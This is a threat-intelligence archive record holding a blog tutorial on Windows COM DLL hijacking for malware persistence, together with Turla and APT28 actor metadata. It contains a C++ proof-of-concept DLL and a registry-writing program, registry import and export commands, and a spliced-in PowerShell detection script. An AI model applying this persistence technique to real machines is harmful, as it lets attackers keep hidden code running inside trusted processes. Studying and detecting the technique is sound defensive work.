{
	"id": "84ffc25c-472f-4747-8706-e18d5cd27a50",
	"created_at": "2026-04-06T00:18:40.010439Z",
	"updated_at": "2026-04-10T13:12:28.311397Z",
	"deleted_at": null,
	"sha1_hash": "a4a698e467acc8ef2673767c7ceee66e8dce124b",
	"title": "Malware development: persistence - part 3. COM DLL hijack. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2290681,
	"plain_text": "Malware development: persistence - part 3. COM DLL hijack.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-05-02 · Archived: 2026-04-05 12:42:23 UTC\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the next part of a series of articles on Windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into another persistence trick: COM hijacking.\r\nComponent Object Model\r\nThe Component Object Model (COM), which Microsoft introduced in the Windows 3.11 era, is an object-oriented system for building binary software components that can interact with other objects. It’s an interface technology that lets you reuse components without knowing how they were implemented internally.\r\nIn this post I’ll show how red teams can use COM objects to run arbitrary code on behalf of a trusted process.\r\nWhen a program needs to load a COM object, it calls the Windows API CoCreateInstance to construct an uninitialized instance of a specific class, passing the class identifier (CLSID) as one of the required parameters.\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\nPage 1 of 12\r\nWhen a program calls CoCreateInstance with a particular CLSID, the operating system consults the registry to discover which binary contains the requested COM code:\r\nThe contents of the InprocServer32 subkey under the CLSID key seen in the previous screenshot are shown in the next one:\r\nIn my case, firefox.exe calls CoCreateInstance with CLSID {A1DB7B5E-D0EA-4FE0-93C4-314505788272}. The file C:\\Windows\\System32\\TaskFlowDataEngine.dll is associated with the registry key HKCU\\Software\\Classes\\CLSID\\{A1DB7B5E-D0EA-4FE0-93C4-314505788272}\\InprocServer32\r\nThere are many ways to execute code, but COM has been employed in red teaming for persistence, lateral movement, and defense evasion in various instances. 
Various registry sub-keys are used for COM hijacking, depending on how the malicious code is run. These are the following:\r\nInprocServer/InprocServer32\r\nLocalServer/LocalServer32\r\nTreatAs\r\nProgID\r\nThe sub-keys listed above are found under the following registry hives:\r\nHKEY_CURRENT_USER\\Software\\Classes\\CLSID\r\nHKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\r\nhow to discover COM keys for hijacking\r\nIdentifying COM keys that can be hijacked is simple and only requires Sysinternals Process Monitor: look for processes that try to open a CLSID server key under HKCU which does not exist there (the lookup fails with NAME NOT FOUND and Windows falls back to the HKLM entry). It also does not require elevated privileges, because the hijack entry is written to HKCU. The following filters can be set up in Process Monitor (Operation is RegOpenKey, Result is NAME NOT FOUND, Path ends with InprocServer32):\r\nIt is also worth adding: Exclude if Path begins with HKLM.\r\nThe HKEY_CURRENT_USER (HKCU) key is examined first when loading COM objects, giving preference to user-specified COM objects over system-wide ones (HKEY_CLASSES_ROOT is a merged view of HKLM\\Software\\Classes and HKCU\\Software\\Classes, with the HKCU entries taking precedence).\r\nIn my case, the firefox.exe process exhibits this behavior in the image below. The process is attempting to access CLSID {A6FF50C0-56C0-71CA-5732-BED303A59628} under the HKCU registry key. Because the CLSID isn’t found in HKCU, Windows falls back to HKCR (HKLM under the hood) for the identical CLSID, which worked in the previous attempt. 
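The lookup order just described (HKCU first, then HKLM via HKCR) is also what makes a hijack easy to hunt for from the defender’s side. The following PowerShell script is an added example and not code from the original post: it walks every CLSID registered under the current user’s hive, compares each InprocServer32 / LocalServer32 target with the machine-wide entry for the same CLSID, and checks whether the target file exists and is Authenticode-signed. It assumes Windows PowerShell 5.1 or later, run as the user being inspected; the file name Find-ComHijack.ps1 and the verdict labels are my own choices. In the scenario of this post it would report {A6FF50C0-56C0-71CA-5732-BED303A59628} with a SHADOWS verdict: the HKCU target is evil.dll while HKLM still points at the original system DLL.

```powershell
# Find-ComHijack.ps1 -- added example, not code from the original post.
# Read-only hunt for per-user COM server registrations: each CLSID under
# HKCU\\Software\\Classes\\CLSID that carries an InprocServer32 or LocalServer32
# key is compared with the machine-wide HKLM entry for the same CLSID. A
# per-user entry pointing somewhere else than the HKLM one is exactly what
# evil.reg / pers.cpp create. No elevation needed; run as the user inspected.

$userRoot    = 'HKCU:\\Software\\Classes\\CLSID'
$machineRoot = 'HKLM:\\Software\\Classes\\CLSID'
$serverKeys  = 'InprocServer32', 'LocalServer32'

function Get-ComServerPath {
    # (default) value of a server key, surrounding quotes stripped and %VARS%
    # expanded; $null when the key or the value is absent.
    param([string]$KeyPath)
    if (-not (Test-Path -LiteralPath $KeyPath)) { return $null }
    $raw = [string](Get-ItemProperty -LiteralPath $KeyPath -ErrorAction SilentlyContinue).'(default)'
    if ([string]::IsNullOrWhiteSpace($raw)) { return $null }
    return [Environment]::ExpandEnvironmentVariables($raw.Trim([char]34))
}

function Resolve-ComServerFile {
    # LocalServer32 values may carry arguments (foo.exe /automation), so try
    # the whole string first, then the first whitespace-delimited token.
    param([string]$ServerPath)
    foreach ($candidate in @($ServerPath, ($ServerPath -split '\\s+', 2)[0])) {
        if ($candidate -and (Test-Path -LiteralPath $candidate -PathType Leaf)) { return $candidate }
    }
    return $null
}

function Find-ComHijack {
    foreach ($clsidKey in Get-ChildItem -LiteralPath $userRoot -ErrorAction SilentlyContinue) {
        $clsid = $clsidKey.PSChildName
        foreach ($sub in $serverKeys) {
            $userPath = Get-ComServerPath ('{0}\\{1}\\{2}' -f $userRoot, $clsid, $sub)
            if ($null -eq $userPath) { continue }
            $machinePath = Get-ComServerPath ('{0}\\{1}\\{2}' -f $machineRoot, $clsid, $sub)

            # HKCU wins over HKLM, so a differing HKCU target is the classic hijack.
            $verdict = if ($null -eq $machinePath) {
                'user-only (per-user install, or hijack of a dangling lookup)'
            } elseif ($userPath -ieq $machinePath) {
                'same target as HKLM'
            } else {
                'SHADOWS HKLM entry'
            }

            $file = Resolve-ComServerFile $userPath
            $sig  = if ($file) { (Get-AuthenticodeSignature -LiteralPath $file).Status } else { 'file missing' }

            [pscustomobject]@{
                CLSID       = $clsid
                Key         = $sub
                Verdict     = $verdict
                Signature   = $sig
                UserPath    = $userPath
                MachinePath = $machinePath
            }
        }
    }
}

$results = @(Find-ComHijack | Where-Object Verdict -ne 'same target as HKLM')
$results | Sort-Object Verdict, CLSID | Format-Table CLSID, Key, Verdict, Signature, UserPath -AutoSize -Wrap
'{0} per-user COM server entries worth a look' -f $results.Count
```

Run it under each account of interest, or walk the SID subkeys of Registry::HKEY_USERS for the other loaded profiles, because the hijack lives in the per-user hive. 32-bit processes read the WOW6432Node views (HKLM\\Software\\WOW6432Node\\Classes\\CLSID and HKCU\\Software\\Classes\\WOW6432Node\\CLSID), which this script does not cover. A user-only entry is not automatically malicious, since per-user installers register COM servers the same way; pivot on the Signature column and on DLLs sitting in user-writable directories.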
The HKCU and HKCR entries for that CLSID can be checked with the following commands:\r\nreg query \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nreg query \"HKCR\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nFollowing the steps outlined above, we now have the critical information we need to launch a COM hijacking attack.\r\nattack process\r\nFirst of all, export the specified subkey, entries, and values of the local computer into a file:\r\nreg export \"HKCR\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" C:\\Users\\User\\Desktop\\shared\\2022\r\nThe next step is to modify this file so that it sets the default value of the HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32 registry key (the exported HKCR path is rewritten to HKEY_CURRENT_USER, so the import lands in the per-user hive and takes precedence over the HKLM entry):\r\nAs you can see, we are placing a custom DLL to be executed:\r\nFor simplicity, as always, I took the same DLL from one of my previous posts.\r\nYou can compile it from source code (evil.cpp):\r\n/*\r\nevil.cpp\r\nsimple DLL for DLL injection into a process\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\n\r\n// entry point called by the loader; the payload runs on DLL_PROCESS_ATTACH,\r\n// i.e. as soon as the hijacked COM server is loaded into the victim process\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n    switch (nReason) {\r\n    case DLL_PROCESS_ATTACH:\r\n        MessageBox(\r\n            NULL,\r\n            \"Meow from evil.dll!\",\r\n            \"=^..^=\",\r\n            MB_OK\r\n        );\r\n        break;\r\n    case DLL_PROCESS_DETACH:\r\n        break;\r\n    case DLL_THREAD_ATTACH:\r\n        break;\r\n    case DLL_THREAD_DETACH:\r\n        break;\r\n    }\r\n    return TRUE;\r\n}\r\nThen, just run:\r\nx86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissive\r\nNote that calling MessageBox from DllMain is fine for a demo but unsafe in general, because DllMain runs under the loader lock; a real payload should do its work outside DllMain.\r\nSave the reg file as evil.reg:\r\nAnd import, then 
check the registry again:\r\nreg import C:\\Users\\User\\Desktop\\shared\\2022-05-02-malware-pers-3\\evil.reg /reg:64\r\nreg query \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\InprocServer32\" /s\r\nPerfect!\r\ndemo\r\nThen restart firefox.exe in my case and wait some time. I waited around 7 minutes:\r\nIf you notice, the PID is 9272. But if you open Process Hacker you can see that it’s not there:\r\nFirefox crashed after some time:\r\nbut it happened only once.\r\nLater, the “meow-meow” messagebox window popped up with some frequency:\r\nAnd even after closing firefox:\r\nThat’s perfect! :)\r\nupdate: programmer way\r\nI also created pers.cpp, a dirty PoC:\r\n/*\r\npers.cpp\r\nwindows low level persistence via COM hijacking\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003ccstdio\u003e\r\n\r\nint main(int argc, char* argv[]) {\r\n    HKEY hkey = NULL;\r\n    // per-user server key for the target CLSID (HKCU is consulted before HKLM)\r\n    const char* sk = \"Software\\\\Classes\\\\CLSID\\\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\\\\InprocServer32\";\r\n    // malicious DLL that the hijacked CLSID will resolve to\r\n    const char* dll = \"C:\\\\Users\\\\User\\\\Desktop\\\\shared\\\\2022-05-02-malware-pers-3\\\\evil.dll\";\r\n    // create (or open) the key; no elevation needed because it lives in HKCU\r\n    LONG res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)sk, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, \u0026hkey, NULL);\r\n    if (res == ERROR_SUCCESS) {\r\n        // set the key's default value to the DLL path (REG_SZ length includes the terminating NUL)\r\n        RegSetValueEx(hkey, NULL, 0, REG_SZ, (const BYTE*)dll, (DWORD)(strlen(dll) + 1));\r\n        RegCloseKey(hkey);\r\n    } else {\r\n        printf(\"cannot create 
subkey for hijacking :(\\n\");\r\n        return -1;\r\n    }\r\n    return 0;\r\n}\r\ncompile it:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nand run:\r\nAs you can see, everything works perfectly :)\r\nCleanup after the experiments (this removes only the per-user key; the machine-wide HKLM entry was never touched):\r\nreg delete \"HKCU\\Software\\Classes\\CLSID\\{A6FF50C0-56C0-71CA-5732-BED303A59628}\" /f\r\nconclusion\r\nAn attacker can use this not-so-common but well-documented technique to persist silently on a system after performing these actions. In the wild, the trick has been used by groups such as APT28 and Turla (for example in Turla’s Mosquito backdoor).\r\nCOM hijacking MITRE ATT\u0026CK (T1546.015)\r\nAPT 28\r\nTurla\r\nRegCreateKeyEx\r\nRegSetValueEx\r\nreg query\r\nreg import\r\nreg export\r\nreg delete\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html"
	],
	"report_names": [
		"malware-pers-3.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434720,
	"ts_updated_at": 1775826748,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.pdf",
		"text": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.txt",
		"img": "https://archive.orkl.eu/a4a698e467acc8ef2673767c7ceee66e8dce124b.jpg"
	}
}